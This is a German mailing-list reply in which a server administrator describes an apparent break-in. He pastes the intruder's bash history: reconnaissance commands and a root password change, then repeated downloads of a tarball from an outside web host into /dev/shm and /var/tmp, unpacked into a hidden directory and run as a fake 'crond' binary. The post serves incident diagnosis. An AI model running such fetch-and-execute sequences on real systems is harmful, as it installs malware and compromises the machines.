[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Veränderte Dateien finden



Peter Blancke wrote:

> Dann beschreibe uns doch einmal genau, was vorgefallen ist und wie
> Du es bemerkt hast. Solange werte ich Deine Aussage zu chkrootkit
> als Nullaussage. Ferner: Kennst Du die (in Debian nicht vorhandene)
> Software rkhunter?

Das root-Passwort wurde geändert. Die Bash-History war anscheinend nicht
gelöscht, und sie enthält folgende letzte Einträge:

uptime
uname -a
passwd
cd /dev/shm
wget www.freewebtown.com/aproape/cornelirina.tgz
 tar zxvf cornelirina.tgz
cd '. '
./crond
./crond
cd /var/tmp
wget www.freewebtown.com/aproape/cornelirina.tgz
 tar zxvf cornelirina.tgz
cd '. '
./crond
w
ps x
cd /var/tmp
wget www.freewebtown.com/aproape/cornelirina.tgz
tar zxvf cornelirina.tgz
cd '. '
./crond




Viele Grüße     Jan



Reply to: